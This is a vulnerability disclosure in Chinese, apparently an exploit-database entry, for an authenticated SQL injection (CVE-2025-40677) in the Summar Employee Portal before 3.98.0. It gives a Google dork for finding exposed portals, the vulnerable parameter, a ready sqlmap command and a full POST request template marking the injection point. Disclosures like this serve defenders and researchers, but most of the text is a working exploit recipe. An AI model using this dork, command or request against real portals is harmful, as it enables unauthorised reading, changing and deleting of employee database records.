漏洞标题: Summar Employee Portal 3.98.0 - 认证SQL注入

Google Dork: inurl:"/MemberPages/quienesquien.aspx"

发布日期: 2025-12-16

漏洞作者: Peter Gabaldon - https://pgj11.com/

厂商主页: https://www.summar.es/

软件链接: https://www.summar.es/software-recursos-humanos/

受影响版本: < 3.98.0

测试环境: Kali Linux

CVE编号: CVE-2025-40677

漏洞描述: Summar Software 的“员工门户”（Portal del Empleado）中存在SQL注入漏洞。该漏洞允许攻击者通过向 /MemberPages/quienesquien.aspx 页面发送POST请求，并在参数 ctl00$ContentPlaceHolder1$filtroNombre 中注入恶意载荷，从而对数据库进行检索、创建、更新和删除操作。

$ sqlmap –random-agent -r req.sqli.xml -p ‘ctl00%24ContentPlaceHolder1%24filtroNombre’ –dbms=“MSSQL”

POST /MemberPages/quienesquien.aspx HTTP/1.1 Host: [已隐藏] Cookie: [已隐藏] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest X-Microsoftajax: Delta=true Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=utf-8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: keep-alive

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL注入点]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=…&__VIEWSTATEGENERATOR=…&__ASYNCPOST=true&